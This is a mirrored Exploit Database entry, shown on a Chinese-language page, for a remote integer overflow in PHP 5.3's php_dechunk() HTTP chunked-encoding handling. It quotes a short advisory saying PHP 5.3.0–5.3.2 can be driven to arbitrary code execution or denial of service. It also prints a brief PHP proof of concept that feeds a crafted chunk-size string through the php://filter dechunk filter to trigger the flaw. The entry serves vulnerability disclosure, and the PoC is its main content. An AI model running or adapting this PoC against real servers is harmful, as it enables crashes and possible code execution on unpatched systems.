PHP 5.3 – ‘PHP_dechunk()’ HTTP Chunked Encoding Integer Overflow

• Exploit Database
• 235 阅读

• 作者： Stefan Esser
  日期： 2010-05-02
• 类别：

  • remote
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/33920/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

  source: https://www.securityfocus.com/bid/39877/info   PHP is prone to a remote integer-overflow vulnerability.   An attacker can exploit this issue to execute arbitrary code in the context of the PHP process. Failed exploit attempts will result in a denial-of-service condition.   PHP 5.3.0 through 5.3.2 are vulnerable; other versions may also be affected.   <?php $x = &apos;0fffffffe   XXX&apos;; file_put_contents("file:///tmp/test.dat",$x); $y = file_get_contents(&apos;php://filter/read=dechunk/resource=file:///tmp/test.dat&apos;); echo "here"; ?>